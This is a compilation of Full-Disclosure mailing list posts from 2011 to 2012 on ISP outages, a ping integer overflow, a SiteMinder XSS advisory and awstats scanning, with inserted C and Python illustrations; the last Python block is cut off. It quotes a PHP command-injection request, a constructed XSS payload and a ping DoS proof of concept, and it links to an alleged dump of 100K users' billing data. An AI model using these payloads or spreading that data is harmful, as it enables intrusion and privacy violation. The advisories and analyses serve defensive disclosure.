> even worse if the hash contains both the IP and the ephemeral port number - this
> can result in intermittent issues that will take *months* to find and diagnose,
> because most users will just hit reload, and since the ephemeral port on their
> end changed, it works for them and they never report it...
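Added example, not from this thread or from any ISP's configuration: a small C simulation of the hash-based back-end selection Valdis describes, with one of eight constructed back ends silently dead. It goes a step beyond the quoted text by comparing the two policies side by side: hashing on the source IP alone (a fixed subset of subscribers fails every time) against hashing on IP plus ephemeral port (every subscriber fails intermittently, and a reload usually "fixes" it). FNV-1a as the hash, eight back ends, the dead slot, the 10.0.0.0/24 subscriber range and the sequential ephemeral-port model are all assumptions of the example.

```c
/* Added example, not from this thread or any real load balancer. Simulates
 * hash-based back-end selection with one dead slot, under two hash policies. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define BACKENDS     8
#define DEAD_BACKEND 5   /* constructed: this slot's server is gone, traffic hashed here is dropped */

/* 32-bit FNV-1a over a byte string; stands in for whatever the balancer really uses. */
static uint32_t fnv1a(const uint8_t *data, size_t len)
{
    uint32_t h = 2166136261u;
    for (size_t i = 0; i < len; i++) {
        h ^= data[i];
        h *= 16777619u;
    }
    return h;
}

/* Policy A: back end chosen from the client's IPv4 address only. */
int pick_by_ip(uint32_t ip)
{
    uint8_t key[4] = { (uint8_t)(ip >> 24), (uint8_t)(ip >> 16),
                       (uint8_t)(ip >> 8),  (uint8_t)ip };
    return (int)(fnv1a(key, sizeof key) % BACKENDS);
}

/* Policy B: back end chosen from the (IP, source port) pair. */
int pick_by_ip_port(uint32_t ip, uint16_t port)
{
    uint8_t key[6] = { (uint8_t)(ip >> 24), (uint8_t)(ip >> 16),
                       (uint8_t)(ip >> 8),  (uint8_t)ip,
                       (uint8_t)(port >> 8), (uint8_t)port };
    return (int)(fnv1a(key, sizeof key) % BACKENDS);
}

/* Under policy A a subscriber either always or never lands on the dead slot:
 * the failure rate is exactly 0.0 or 1.0, and "hit reload" never helps. */
double failure_rate_ip_only(uint32_t ip)
{
    return pick_by_ip(ip) == DEAD_BACKEND ? 1.0 : 0.0;
}

/* How many of n consecutive subscriber addresses are stuck on the dead slot. */
int count_affected_ips(uint32_t first_ip, int n)
{
    int affected = 0;
    for (int i = 0; i < n; i++)
        if (pick_by_ip(first_ip + (uint32_t)i) == DEAD_BACKEND)
            affected++;
    return affected;
}

/* Under policy B the same subscriber retries from fresh ephemeral ports (modelled
 * here as sequential), so each attempt has about a 1-in-BACKENDS chance of hitting
 * the dead slot: intermittent failures that most users never report. */
double failure_rate_ip_port(uint32_t ip, uint16_t first_port, int attempts)
{
    int failed = 0;
    for (int i = 0; i < attempts; i++)
        if (pick_by_ip_port(ip, (uint16_t)(first_port + i)) == DEAD_BACKEND)
            failed++;
    return (double)failed / attempts;
}

int main(void)
{
    uint32_t subscriber = 0x0A000001u; /* constructed: 10.0.0.1 */
    printf("IP-only hash: 10.0.0.1 fails %.0f%% of the time; %d of 256 addresses in 10.0.0.0/24 are stuck\n",
           100 * failure_rate_ip_only(subscriber), count_affected_ips(0x0A000000u, 256));
    printf("IP+port hash: 10.0.0.1 fails %.1f%% of 4096 attempts from ports 32768 upward\n",
           100 * failure_rate_ip_port(subscriber, 32768, 4096));
    return 0;
}
```

With eight slots and FNV-1a, the low three bits of the hash are a bijection of the last key byte, so a full run of 256 consecutive addresses (or 256 consecutive ports) hits the dead slot exactly 32 times: one subscriber in eight is permanently broken under policy A, while under policy B every subscriber sees exactly 12.5% of attempts fail and the other 87.5% succeed. The second pattern is the one that takes months to diagnose, because reload makes the symptom go away.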


Re: [Full-disclosure] is my ISP lying or stupid?

2012-03-16 Thread James Condron
Chances are a datacenter monkey pulled a power cable out, or they meant router 
and didn't want to confuse you.

Worked for a couple of ISPs, they all send the same emails out when something 
breaks.

Shouldn't worry about it. Also wouldn't get all higher-than-thou/ "who are 
these noobs".

Just get on with your life and admit they're lying to you and couldn't give a 
fuck whether you know it or not.

Sent using BlackBerry® from Orange

-Original Message-
From: rancor 
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Fri, 16 Mar 2012 19:04:17 
To: Jerry dePriest
Cc: 
Subject: Re: [Full-disclosure] is my ISP lying or stupid?



Re: [Full-disclosure] [iputils] Integer overflow in iputils ping/ping6 tools

2012-03-13 Thread James Condron
Awww come on,

Let them have their win. You're the kind of guy who tells a 3 year old their 
finger painting on the fridge is shit, aren't you?


Sent using BlackBerry® from Orange

-Original Message-
From: Marcus Meissner 
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Tue, 13 Mar 2012 23:17:41 
To: Christophe Alladoum
Cc: 
Subject: Re: [Full-disclosure] [iputils] Integer overflow in iputils
ping/ping6 tools

Hi,

How is this different from writing a fork bomb?

Ciao, Marcus

On Tue, Mar 13, 2012 at 09:42:29AM +0100, Christophe Alladoum wrote:
> [ Description ]
> 
> An integer overflow was found in the iputils/ping_common.c main_loop() function
> which could lead to excessive CPU usage when triggered (could lead to DoS). This
> means that both ping and ping6 are vulnerable.
> 
> 
> [ Proof-Of-Concept ]
> 
> Specify "big" interval (-i option) for ping/ping6 tool:
> {{{
> $ ping -i 3600 google.com
> PING google.com (173.194.66.102) 56(84) bytes of data.
> 64 bytes from we-in-f102.1e100.net (173.194.66.102): icmp_req=1 ttl=50 
> time=11.4 ms
> [...]
> }}}
> 
> And check your CPU usage (top, htop, etc.)
> 
> 
> [ Explanation ]
> 
> Here, ping will loop in main_loop() loop in this section of code :
> {{{
> /* from iputils-s20101006 source */
> /* ping_common.c */
> 
> 546 void main_loop(int icmp_sock, __u8 *packet, int packlen)
> 547 {
> [...]
> 559 for (;;) {
> [...]
> 572 do {
> 573 next = pinger();
> 574 next = schedule_exit(next);
> 575 } while (next <= 0);
> [...]
> 588 if ((options & (F_ADAPTIVE|F_FLOOD_POLL)) || 
> next [...]
> 593 if (1000*next <= 100/(int)HZ) {
> }}}
> 
> If the interval parameter (-i) is set, then the condition at L593 will overflow
> (i.e. a value exceeding sizeof(signed integer)), making this statement "always
> true" for big values (e.g. -i 3600). As a consequence, the ping process will
> start looping actively as long as the condition is true (could be pretty long).
> 
> As far as we looked, this bug is unlikely to be exploitable besides provoking
> Denial-Of-Service.
> 
> 
> [ Affected versions ]
> 
> Tested on Fedora/Debian/Gentoo Linux systems (2.6.x x86_32 and x86_64) on
> iputils version 20101006. ping6 also seems to be affected since it relies on the
> same ping_common.c functions.
> 
> Since iputils is no longer maintained
> (http://www.spinics.net/lists/netdev/msg191346.html), the patch must be applied
> from source.
> 
> 
> [ Patch ]
> Quick'n dirty patch (full patch in appendix) is to cast the test result as long
> long:
> {{{
> 593  if (((long long)1000*next) <= (long long)100/(int)HZ) {
> }}}
> 
> 
> [ Credits ]
> * Christophe Alladoum (HSC)
> * Romain Coltel (HSC)
> 
> 
> -- 
> Christophe Alladoum - 
> Hervé Schauer Consultants - 
> 

-- 
Working, but not speaking, for the following German company:
SUSE LINUX Products GmbH, HRB 16746 (AG Nuernberg)
Geschaeftsfuehrer: Jeff Hawn, Jennifer Guild, Felix Imendoerffer

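Added example, not code from iputils or from the advisory above: a C program that reproduces the arithmetic behind the reported always-true comparison at ping_common.c line 593 and the proposed long long cast. It uses an explicit unsigned multiply to model the 32-bit wraparound, so the demonstration is well defined in C rather than relying on signed-overflow undefined behaviour. The 100 Hz tick rate (HZ) and the assumption that ping keeps the interval in milliseconds (so -i 3600 becomes 3600000) are assumptions of the example; the right-hand side of the comparison is written as it appears in the quoted snippet.

```c
/* Added example, not from iputils: shows why 1000*next goes negative for large
 * -i values under int arithmetic, and why the long long cast fixes it. */
#include <stdint.h>
#include <stdio.h>

/* Assumption of this example: a 100 Hz kernel tick. */
#define HZ 100

/* What a 32-bit int multiply yields on two's-complement hardware once the
 * product exceeds INT32_MAX: it wraps modulo 2^32 and is read back as signed. */
static int32_t wrap_mul_1000(int32_t next_ms)
{
    uint32_t product = (uint32_t)1000 * (uint32_t)next_ms; /* well-defined wrap */
    return (int32_t)product;
}

/* The condition as written at line 593 (int arithmetic). Returns 1 when ping
 * would take the "interval shorter than a tick" branch and start busy polling. */
int interval_check_vulnerable(int32_t next_ms)
{
    return wrap_mul_1000(next_ms) <= 100 / (int)HZ;
}

/* The condition with the proposed cast: the product is formed in 64 bits, so a
 * large interval compares as large and the busy-polling branch is not taken. */
int interval_check_fixed(int32_t next_ms)
{
    return ((long long)1000 * next_ms) <= (long long)100 / (int)HZ;
}

/* Smallest interval in ms at which 1000*next no longer fits in 32 bits. */
int32_t smallest_overflowing_interval_ms(void)
{
    return INT32_MAX / 1000 + 1; /* 2147484 ms, just under 36 minutes */
}

int main(void)
{
    /* Constructed sample intervals around the overflow boundary; 3600000 ms is
       the -i 3600 from the report under the millisecond-units assumption. */
    const int32_t samples[] = { 1000, 2147483, 2147484, 3600000 };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        printf("next=%8d ms  int check: %d (1000*next wraps to %11d)  long long check: %d\n",
               samples[i], interval_check_vulnerable(samples[i]),
               wrap_mul_1000(samples[i]), interval_check_fixed(samples[i]));
    }
    printf("first interval that overflows: %d ms\n", smallest_overflowing_interval_ms());
    return 0;
}
```

The boundary is at 2147484 ms: one millisecond below it, 1000*next is still positive and the check is false; from there upward the product wraps negative, the int comparison becomes true, and ping spins until the (very long) interval elapses. The same inputs through the long long version return false, which is the behaviour the patch restores.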


Re: [Full-disclosure] Iciniti Store SQL Injection - Security Advisory - SOS-12-003

2012-03-07 Thread James Parson
This advisory is incorrect.

The reported SQL injection vulnerability is not present within the version
(4.3.3683.31484) of Iciniti Store claimed to be affected.

In addition, the legitimacy of the supplied proof of concept is
questionable. The SQL statement shown would only be syntactically valid
when injected and elicit a response containing the database version in the
rarest of circumstances. It appears to have not been verified by Sense of
Security.

ICINITI Corporation has been contacted to comment on this advisory.

Re: [Full-disclosure] Botnet Traffic

2012-02-23 Thread James Smith
Thanks, this is very helpful as well.

-Original Message- 
From: Hurgel Bumpf
Sent: Thursday, February 23, 2012 8:52 PM
To: ja...@smithwaysecurity.com ; full-disclosure@lists.grok.org.uk
Subject: AW: [Full-disclosure] Botnet Traffic




check the arbor atlas for worldwide threats and sources..

http://atlas.arbor.net/

-HB

--
James Smith schrieb am Do., 23. Feb 2012 17:20 EST:

>Hello,
>
>Can anyone on this list provide botnet network traffic for analysis, or IPs 
>which have been infected?
>-- 
>Sincerely;
>
>
>James Smith
>CEO, CEH, Security Analyst
>Email: ja...@smithwaysecurity.com
>Phone: 1877-760-1953
>Website: www.SmithwaySecurity.com
>
>
>CONFIDENTIALITY NOTICE: This communication with its contents may contain 
>confidential and/or legally privileged information. It is solely for the 
>use of the intended recipient(s). Unauthorized interception, review, use or 
>disclosure is prohibited and may violate applicable laws including the 
>Electronic Communications Privacy Act. If you are not the intended 
>recipient, please contact the sender and destroy all copies of the 
>communication.
>
>- This communication is confidential to the parties it was intended to 
>serve - 


[Full-disclosure] Botnet Traffic

2012-02-23 Thread James Smith
Hello,

Can anyone on this list provide botnet network traffic for analysis, or IPs 
which have been infected?
-- 
Sincerely;


James Smith
CEO, CEH, Security Analyst
Email: ja...@smithwaysecurity.com
Phone: 1877-760-1953
Website: www.SmithwaySecurity.com


CONFIDENTIALITY NOTICE: This communication with its contents may contain 
confidential and/or legally privileged information. It is solely for the use of 
the intended recipient(s). Unauthorized interception, review, use or disclosure 
is prohibited and may violate applicable laws including the Electronic 
Communications Privacy Act. If you are not the intended recipient, please 
contact the sender and destroy all copies of the communication.

- This communication is confidential to the parties it was intended to serve -

Re: [Full-disclosure] Fwd: Re: Operation Bring Peace To Machines

2012-02-18 Thread james
Now that's a controversial stance.

True; but you'll always find idiots who will fight it.

Sent from my BlackBerry® wireless device

-Original Message-
From: Ian Hayes 
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Sat, 18 Feb 2012 12:37:42 
To: 
Subject: Re: [Full-disclosure] Fwd: Re: Operation Bring Peace To Machines



Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.

2012-02-10 Thread james
Waidaminnit... Didn't you try to sell me a belkin the other day?

Conflict of interest there.

Sent from my BlackBerry® wireless device

-Original Message-
From: valdis.kletni...@vt.edu
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Fri, 10 Feb 2012 11:06:49 
To: 
Cc: 
Subject: Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps
vulnerability.



Re: [Full-disclosure] can you answer this?

2012-02-03 Thread james
So what's the question?

--Original Message--
From: RandallM
Sender: full-disclosure-boun...@lists.grok.org.uk
To: funsec
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] can you answer this?
Sent: 3 Feb 2012 08:20

since no one could answer the last one how bout this. In my FW log
Trust (our 10.0.0.0 network) to untrust picked this up:

2012-02-02 10:08:10 7.254.254.254:68 7.254.254.255:67 0.0.0.0:0
0.0.0.0:0 DHCP 0 sec. 0 0 Traffic Denied

My "any" to "any" denied queue.

-- 
been great, thanks
RandyM
a.k.a System



Sent from my BlackBerry® wireless device


Re: [Full-disclosure] Facebook seems to think my Arch Linux box has malware on it

2012-01-20 Thread James Condron
Yeah, you really weren't, you were telling us how you would have handled it, 
with all the buzzwords and terms you could have thought of.

Hell, I'm surprised you didn't manage to get the word 'synergy' in there.

" I would do a dns lookup and then compare those results to that of a public 
web service, and save the links for the AVs to check if they have any malicious 
history associated with them."

Reads like a bad Hollywood script.

"First I would ping the phone number and see if I could telnet to the ICMP, 
then get the PTR of the MAC address and use an ARP overflow and spoof the TTL 
of the Window Size and..." (etc. etc.)

What are you suggesting; take a look at where the request is coming from and 
make a decision based on that whether the software is being punted by facebook 
or a third party?

Fine- just say that; make your suggestion and get on with your life. It's a 
little trite as advice goes, but if that's all you can contribute then go for it.

Coming in with your Marky-Mark talk of "First I'd get the first hijacker and 
use his head to kill the second hijacker and then I'd be all like 'yeah, let's 
land the plane here- let me drive'" is not very helpful.

On 20 Jan 2012, at 22:37, Gage Bystrom wrote:

> What the hell are you talking about? I was just giving some advice on how he 
> could check if it was legit or not if it happens again.
> 
> What crawled up your ass and died this morning?
> 
> On Jan 20, 2012 2:21 PM,  wrote:
> You should tell us what you would have done had you been on one of the 
> hijacked sept 11 planes.
> 
> Bet things would have gone down different then, amiright?
> 
> Sent from my BlackBerry® wireless device
> 
> -Original Message-
> From: Gage Bystrom 
> Sender: full-disclosure-boun...@lists.grok.org.uk
> Date: Fri, 20 Jan 2012 13:29:01
> To: Wesley Kerfoot; 
> full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Facebook seems to think my Arch Linux box has
>  malware on it
> 


Re: [Full-disclosure] Facebook seems to think my Arch Linux box has malware on it

2012-01-20 Thread james
You should tell us what you would have done had you been on one of the hijacked 
sept 11 planes.

Bet things would have gone down different then, amiright?

Sent from my BlackBerry® wireless device

-Original Message-
From: Gage Bystrom 
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Fri, 20 Jan 2012 13:29:01 
To: Wesley Kerfoot; 
full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Facebook seems to think my Arch Linux box has
 malware on it



Re: [Full-disclosure] Fwd: Rate Stratfor's Incident Response

2012-01-10 Thread James Smith
Well I have been in their irc chat rooms. A few of them are very Intelligent in 
Information Security. Well if you are only defining say #AntiSec- I would say 
about less than a third.
As for the other 97% they just know how to attack and exploit vulnerabilities.

From: Laurelai 
Sent: Wednesday, January 11, 2012 3:17 AM
To: Kyle Creyts 
Cc: full-disclosure@lists.grok.org.uk ; James Smith 
Subject: Re: [Full-disclosure] Fwd: Rate Stratfor's Incident Response

On 1/11/12 1:15 AM, Kyle Creyts wrote: 
  How many of those engaged in these attacks _could_ actually fix the vulns 
they exploit? What is a good "rough estimate" in your opinion?

  On Jan 11, 2012 12:47 AM, "Laurelai"  wrote:

On 1/10/12 11:32 PM, James Smith wrote:
> Well I do agree with what you are stating. As I have seen incidents
> like this happen too many times.
> This mailing list is a big part of the IT Security community.
>
>
>
> -Original Message- From: Laurelai
> Sent: Wednesday, January 11, 2012 1:18 AM
> To: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Fwd: Rate Stratfor's Incident Response
>
> On 1/10/12 10:18 PM, Byron Sonne wrote:
>>> Don't piss off a talented adolescent with computer skills.
>> Amen! I love me some stylin' pwnage :)
>>
>> Whether they were skiddies or actual hackers, it's still amusing (and
>> frightening to some) that companies who really should know better, in
>> fact, don't.
>>
> And again, if companies hired these people, most of whom come from
> disadvantaged backgrounds and are self taught they wouldn't have as much
> a reason to be angry anymore. Most of them feel like they don't have any
> real opportunities for a career and they are often right. Microsoft
> hired some kid who hacked their network, it is a safe bet he isn't going
> to be causing any trouble anymore. Talking about the trust issue, who
> would you trust more the person who has all the certs and experience
> that told you your network was safe or the 14 year old who proved him
> wrong? We all know if that kid had approached microsoft with his exploit
> in a responsible manner they would have outright ignored him, that's why
> this mailing list exists, because companies will ignore security issues
> until it bites them in the ass to save a buck.
>
> People are way too obsessed with having certifications that don't
> actually teach practical intrusion techniques. If a system is so fragile
> that teenagers can take it down with minimal effort then there is a
> serious problem with the IT security industry. Think about it how long
> has sql injection been around? There is absolutely no excuse for being
> vulnerable to it. None whatsoever. These kids are showing people the
> truth about the state of security online and that is what's making people
> afraid of them. They aren't writing 0 days every week, they are using
> vulnerabilities that are publicly available. Using tools that are
> publicly available, tools that were meant to be used by the people
> protecting the systems. Clearly the people in charge of protecting these
> system aren't using these tools to scan their systems or else they would
> have found the weaknesses first.
>
> The fact that government organizations and large name companies and
> government contractors fall prey to these types of attacks just goes to
> show the level of hypocrisy inherent to the situation. Especially when
> their solution to the problem is to just pass more and more restrictive
> laws (as if that's going to stop them). These kids are showing people
> that the emperor has no clothes and that's what's making people angry,
> they are putting someone's paycheck in danger. Why don't we solve the
> problem by actually addressing the real problem and fixing systems that
> need to be fixed? Why not hire these kids with the time and energy on
> their hands to probe for these weaknesses on a large scale? The ones
> currently in the job slots to do this clearly aren't doing it.  I bet if
> they started replacing these people with these kids it would shake the
> lethargy out of the rest of them and you would see a general increase in
> competence and security. Knowing that if you get your network owned by a
> teenager will not only get you fired, but replaced with said teenager is
> one hell of an incentive to make sure you get it right.
>
>
> Yes they would have to be taught additional skills to round out wha

Re: [Full-disclosure] Who's Behind the Koobface Botnet? - An OSINT Analysis

2012-01-09 Thread james
I was working at coreix when we took down the original C&C and have icq 
numbers, source and logs.

What's your point? I'm sure it's good work but this was all done over a year ago 
and is on copies in a police store room somewhere.


Sent from my BlackBerry® wireless device

-Original Message-
From: Dancho Danchev 
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Mon, 9 Jan 2012 07:02:06 
To: 
Subject: [Full-disclosure] Who's Behind the Koobface Botnet? - An OSINT
Analysis

Hi everyone,

In this post, I will perform an OSINT analysis, exposing one of the
key botnet masters behind the infamous Koobface botnet, that I have
been extensively profiling and infiltrating since day one. I will
include photos of the botnet master, his telephone numbers, multiple
email addresses, license plate for a BMW, and directly connect him
with the infrastructure -- now offline or migrated to a different
place -- of Koobface 1.0.

The analysis is based on a single mistake that the botnet master made
- namely using his personal email for registering a domain parked
within Koobface's command and control infrastructure, that at a
particular moment in time was directly redirecting to the ubiquitous
fake Youtube page pushed by the Koobface botnet.

http://ddanchev.blogspot.com/2012/01/whos-behind-koobface-botnet-osint.html

Regards
--
Dancho Danchev
Cyber Threats/CyberCrime Analyst | Security Blogger, ZDNet at CBS
Interactive | Security Blogger at Webroot
Personal Blog: http://ddanchev.blogspot.com
ZDNet Blog: http://blogs.zdnet.com/security
Webroot Blog: http://blog.webroot.com
Twitter: http://twitter.com/danchodanchev
LinkedIn: http://nl.linkedin.com/in/danchodanchev
Facebook: http://facebook.com/dancho.danchev
Skype ID: dancho_danchev_



Re: [Full-disclosure] sai8 User Data Exposition

2012-01-06 Thread James Condron
Oh brilliant,

Exactly what we use FD for; to hear about unverified data and read worthless 
text files.

4chan generally care about this sort of thing; go get your 'lulz' son.

On 6 Jan 2012, at 09:46, Augustus Clay wrote:

> billing and data of 100K Italian users...
> The very secure company is: SAI 8 S.P.A.
> web site: http://www.sai8.it
> 
> http://www.mediafire.com/?5jh7p1vp8voykez
> http://849801.dnaq.cn/sai8file
> 
> 


Re: [Full-disclosure] facebook

2012-01-02 Thread James Condron
Yup...

jc@egg:~$ dig TXT astalavista.com

; <<>> DiG 9.6-ESV-R4-P3 <<>> TXT astalavista.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6237
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;astalavista.com.   IN  TXT

;; AUTHORITY SECTION:
astalavista.com.10789   IN  SOA ns.ch-inter.net. 
hostmaster.metanet.ch. 2002010198 10800 3600 604800 43200

;; Query time: 25 msec
;; SERVER: 192.168.1.1#53(192.168.1.1)
;; WHEN: Mon Jan  2 22:57:32 2012
;; MSG SIZE  rcvd: 105


On 2 Jan 2012, at 22:55, valdis.kletni...@vt.edu wrote:

> On Mon, 02 Jan 2012 12:47:37 PST, t0hitsugu said:
>> uh..wtf?
> 
>> On Jan 2, 2012 12:46 PM,  wrote:
>>> Ladies and gentleman, I will be unplugged from my email until the 17th of
>>> January.
> 
> That should read: "Ladies and gentlemen, my email address will be available for
> social engineering and other abuse until the 17th of January". :)
> 


Re: [Full-disclosure] CertificationMagazine - Blind SQL Injection Vulnerability Super vulnerability-lab hack

2011-12-24 Thread james
Thought the same thing;

Spoken -> Slander
Literature -> Libel

Is the way we learnt it way back when in school.

Mind, that wasn't the biggest problem in that email.


Sent from my BlackBerry® wireless device

-Original Message-
From: "Thor (Hammer of God)" 
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Sat, 24 Dec 2011 23:57:36 
To: Tomy; 
resea...@vulnerability-lab.com
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] CertificationMagazine - Blind SQL
Injection   Vulnerability Super vulnerability-lab hack

>I am not a member of ariko-security / but it's not possible what you have 
>written it's primitive slander.

FYI, you can't "write" slander.  One "speaks" slander, one "writes" libel.  
t



Re: [Full-disclosure] New awstats.pl vulnerability?

2011-12-22 Thread james
From analysis on compromised sites I've been receiving abuse messages for at 
$day_job, they're launched from IRC bots on compromised servers, mainly cPanel; 
cPanel is cool for novices but skimps on security out of the box.

Will dig out some signatures when I get into the office.

Sent from my BlackBerry® wireless device

-Original Message-
From: Lamar Spells 
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Thu, 22 Dec 2011 23:23:11 
To: Nikolay Kichukov
Cc: 
Subject: Re: [Full-disclosure] New awstats.pl vulnerability?

Here is an update on this:

Over the past week, we have seen the awstats activity continue, but
morph to include other vulnerabilities.  Details of this are at
http://foxtrot7security.blogspot.com/2011/12/attacks-against-awstats-also-includes.html
-- but the summary is that we have seen activity change to include
Local File Inclusion and command injection in phpAlbum and other
components written in PHP.

We started seeing today some activity related to phpthumb and
CVE-2010-1598...  Details of this are at
http://foxtrot7security.blogspot.com/2011/12/new-attempts-to-exploit-old-phpthumb.html

I am really curious as to the motivation of the parties deploying
these types of scans.  I understand that they would like to find
vulnerable systems to compromise... but for what purpose?  Sending
spam?  So far, based on what I am seeing, it looks like they are
compromising systems just to have those systems look for more systems
to compromise.  At this point, I have to assume that they are still in
the construction and building phase...

On Fri, Dec 16, 2011 at 2:43 PM, Lamar Spells  wrote:
> Here are some additional IPs and some analysis of the IPs in question.
>  Looks like very few of the scanning IPs are running awstats, but many
> are legitimate business running old apache versions.  I am guessing
> they didn't self install an awstats scanner...
>
> http://foxtrot7security.blogspot.com/2011/12/importance-of-patching.html
>
>
> On Tue, Dec 13, 2011 at 7:51 AM, Lamar Spells  wrote:
>> Today we are also seeing requests like this one which is looking to
>> exploit CVE-2008-3922:
>>
>> GET /awstatstotals/awstatstotals.php ?
>> sort={${passthru(chr(105).chr(100))}}{${exit()}}
>>
>>
>>
>> On Tue, Dec 13, 2011 at 2:17 AM, Nikolay Kichukov  wrote:
>>> -BEGIN PGP SIGNED MESSAGE-
>>> Hash: SHA1
>>>
>>> Same here, I even tried to notify a bunch of the ISP registrators of the IP 
>>> address range those originated from.
>>>
>>> - -Nik
>>>
>>>
>>>
>>> On 12/13/2011 07:30 AM, Bruce Ediger wrote:
>>>> On Mon, 12 Dec 2011, Lamar Spells wrote:
>>>>
>>>>> For the past several days, I have been seeing thousands of requests
>>>>> looking for awstats.pl like this one:
>>>>
>>>> Yeah, me too.  They just started up.  I haven't seen any awstats.pl
>>>> requests since 2010-05-18, and now I've gotten batches of them, since
>>>> about 2011-11-22, but heavier since the start of December.
>>>>
>>> -BEGIN PGP SIGNATURE-
>>> Version: GnuPG v1.4.11 (GNU/Linux)
>>> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
>>>
>>> iQEcBAEBAgAGBQJO5vwQAAoJEDFLYVOGGjgX8oEH/i3kjBAtJcT1DJvJVcRX4O+9
>>> t2UcvehxpyjalhCttTmQrE8EcLrtGS62K0ZziNQPvXirOtJ0ERcaARsQFiTT7fCi
>>> YyEuNDa15nx+wS2dgnKWEyCjz356RobtXgFflrbfHNPmBCRGd/qM3VzquUDYRdef
>>> E+JtU0J3RgilXxMFLrZK5GHwZOUKNebv/T6bRPescMzRsX/DO89Csv0kWJM9xvyI
>>> kd0El+/thw8aj9/21dB/JWhdbiBozuKd2MG1hTog/xKFVzVqdTzkNoZ7Ok15n91v
>>> LoAx7cLqDInmx1syDLOSMhzRoyqGAA9Uq/WuTpDqTDcHjVwjGJPeYjc97dIJWdY=
>>> =0+7+
>>> -END PGP SIGNATURE-
>>>



[Full-disclosure] CA20111208-01: Security Notice for CA SiteMinder

2011-12-09 Thread Williams, James K
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CA20111208-01: Security Notice for CA SiteMinder

Issued: December 08, 2011

CA Technologies Support is alerting customers to a potential risk in 
CA SiteMinder. A vulnerability exists that can allow a malicious user 
to execute a reflected cross site scripting (XSS) attack. CA 
Technologies has issued patches to address the vulnerability.

The vulnerability, CVE-2011-4054, occurs due to insufficient 
validation of postpreservationdata parameter input utilized in the 
login.fcc form. A malicious user can submit a specially crafted 
request to effectively hijack a victim’s browser.

Risk Rating

Medium

Platform

All

Affected Products

CA SiteMinder R6 SP6 CR7 and earlier
CA SiteMinder R12 SP3 CR8 and earlier

Non-Affected Products

CA SiteMinder R6 SP6 CR8
CA SiteMinder R12 SP3 CR9

How to determine if the installation is affected

Check the Web Agent log or Installation log to obtain the installed 
release version. Note that the "webagent.log" file name is 
configurable by the SiteMinder administrator.

Solution

CA is issuing patches to address the vulnerability.

CA SiteMinder R6:
Upgrade to R6 SP6 CR8 or later (Expected Availability: January 2012)

CA SiteMinder R12:
Upgrade to R12 SP3 CR9 or later

CR releases can be found on the CA SiteMinder 
Hotfix/Cumulative Release page:
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={5AE61E29-C3DE-405E-9151-9EEA72D965CE}

Workaround

None

References

CVE-2011-4054 - CA SiteMinder login.fcc XSS

Acknowledgement

CVE-2011-4054 - Jon Passki of Aspect Security, via CERT

Change History

Version 1.0: Initial Release

If additional information is required, please contact CA 
Technologies Support at https://support.ca.com.

If you discover a vulnerability in CA Technologies products, please 
report your findings to the CA Technologies Product Vulnerability 
Response Team.
support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782


Thanks and regards,
Ken Williams, Director
CA Technologies Product Vulnerability Response Team
CA Technologies Business Unit Operations
wilj...@ca.com 

-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.9.1 (Build 287)
Charset: utf-8

wj8DBQFO4glXeSWR3+KUGYURAotyAJ4nT1pij7Nb2uOCKgXnhGvK5If7DgCfX5ht
GdIeR80Ie/6he0y0K5uQLoQ=
=U3C2
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
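The advisory above describes the bug class but shows no code. The block below is an added illustration of that class, a request parameter echoed back into a login form without output encoding, beside the hardened rendering. It is not CA code and does not reproduce SiteMinder's login.fcc; the template, the character set assumed for the preserved data and the function names are hypothetical, and the attacker input is constructed for the example.

```python
"""Reflected parameter in a login form: unsafe echo vs. escaped echo.

Added example for the advisory above; not CA code. FORM_TEMPLATE is a
hypothetical stand-in for a form that carries POST data through the
login round-trip in a hidden field. PAYLOAD is constructed input.
"""
import html
import re

# Hypothetical hidden field; the real form markup is not on the page.
FORM_TEMPLATE = '<input type="hidden" name="postpreservationdata" value="{value}">'

# Constructed attacker value: closes the attribute and the tag, injects script,
# then reopens an attribute so the trailing '">' still parses.
PAYLOAD = '"><script>alert(1)</script><input value="'

# Assumed on-the-wire shape of preserved data (base64-like). If the real
# encoding differs, widen this; the point is to validate before reflecting.
PRESERVED_DATA_RE = re.compile(r"^[A-Za-z0-9+/=_-]*$")

_TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")


def is_valid_preservation_data(value: str) -> bool:
    """Input validation: reject anything outside the expected alphabet."""
    return bool(PRESERVED_DATA_RE.match(value))


def render_unsafe(value: str) -> str:
    """Vulnerable pattern: the parameter is interpolated verbatim."""
    return FORM_TEMPLATE.format(value=value)


def render_escaped(value: str) -> str:
    """Hardened pattern: escape & < > " ' before interpolating into a quoted
    attribute, so the value cannot break out of it."""
    return FORM_TEMPLATE.format(value=html.escape(value, quote=True))


def render_checked(value: str) -> str:
    """Defence in depth: validate the input, then still encode on output."""
    if not is_valid_preservation_data(value):
        raise ValueError("postpreservationdata has unexpected characters")
    return render_escaped(value)


def tag_count(markup: str) -> int:
    """Count HTML tags in the rendered fragment; one hidden input should
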